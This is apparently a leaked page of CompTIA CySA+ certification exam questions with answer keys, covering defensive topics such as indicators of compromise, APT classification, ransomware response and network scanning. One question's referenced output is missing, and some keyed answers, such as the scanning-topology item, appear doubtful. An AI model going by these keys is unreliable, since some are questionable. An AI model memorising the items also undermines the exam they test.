CompTIA CySA+ Certification Exam v1.0 (CS0-001)

Page:    1 / 28   
Total 416 questions

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

  • A. The analyst is not using the standard approved browser.
  • B. The analyst accidently clicked a link related to the indicator.
  • C. The analyst has prefetch enabled on the browser in use.
  • D. The alert in unrelated to the analyst’s search.


Answer : C

Explanation:

Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Choose two.)

  • A. Patching
  • B. NIDS
  • C. Segmentation
  • D. Disabling unused services
  • E. Firewalling


Answer : CD

Explanation:

An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?

  • A. Zero-day attack
  • B. Known malware attack
  • C. Session hijack
  • D. Cookie stealing


Answer : A

Explanation:

A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops.
The solution should be able to scale, provide minimum false positives and high accuracy of results, and be centrally managed through an enterprise console.
Which of the following scanning topologies is BEST suited for this environment?

  • A. A passive scanning engine located at the core of the network infrastructure
  • B. A combination of cloud-based and server-based scanning engines
  • C. A combination of server-based and agent-based scanning engines
  • D. An active scanning engine installed on the enterprise console


Answer : D

Explanation:

A cybersecurity analyst is completing an organization’s vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report?

  • A. Processor utilization
  • B. Virtual hosts
  • C. Organizational governance
  • D. Log disposition
  • E. Asset isolation


Answer : B

Explanation:

A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company’s asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization?

  • A. A manual log review from data sent to syslog
  • B. An OS fingerprinting scan across all hosts
  • C. A packet capture of data traversing the server network
  • D. A service discovery scan on the network


Answer : B

Explanation:

A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement?

  • A. Self-service password reset
  • B. Single sign-on
  • C. Context-based authentication
  • D. Password complexity


Answer : C

Explanation:

A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

  • A. Syslog
  • B. Network mapping
  • C. Firewall logs
  • D. NIDS


Answer : A

Explanation:

A software patch has been released to remove vulnerabilities from company’s software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT?

  • A. Fuzzing
  • B. User acceptance testing
  • C. Regression testing
  • D. Penetration testing


Answer : C

Explanation:
Reference:
https://en.wikipedia.org/wiki/Regression_testing

During a routine review of firewall logs, an analyst identified that an IP address from the organization’s server subnet had been connecting during nighttime hours to a foreign IP address, and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident’s impact assessment?

  • A. PII of company employees and customers was exfiltrated.
  • B. Raw financial information about the company was accessed.
  • C. Forensic review of the server required fall-back on a less efficient service.
  • D. IP addresses and other network-related configurations were exfiltrated.
  • E. The local root password for the affected server was compromised.


Answer : A

Explanation:

A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered?

  • A. DDoS
  • B. APT
  • C. Ransomware
  • D. Software vulnerability


Answer : B

Explanation:

A threat intelligence analyst who works for a technology firm received this report from a vendor. “There has been an intellectual property theft campaign executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector.â€
Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity?

  • A. Polymorphic malware and secure code analysis
  • B. Insider threat and indicator analysis
  • C. APT and behavioral analysis
  • D. Ransomware and encryption


Answer : C

Explanation:

The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:

Locky.js -
xerty.ini
xerty.lib
Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done
FIRST to prevent data on the company NAS from being encrypted by infected devices?

  • A. Disable access to the company VPN.
  • B. Move the files from the NAS to a cloud-based storage solution.
  • C. Set permissions on file shares to read-only.
  • D. Add the URL included in the .js file to the company’s web proxy filter.


Answer : D

After running a packet analyzer on the network, a security analyst has noticed the following output:


Which of the following is occurring?

  • A. A ping sweep
  • B. A port scan
  • C. A network map
  • D. A service discovery


Answer : B

Explanation:

A network technician is concerned that an attacker is attempting to penetrate the network, and wants to set a rule on the firewall to prevent the attacker from learning which IP addresses are valid on the network. Which of the following protocols needs to be denied?

  • A. TCP
  • B. SMTP
  • C. ICMP
  • D. ARP


Answer : C

Page:    1 / 28   
Total 416 questions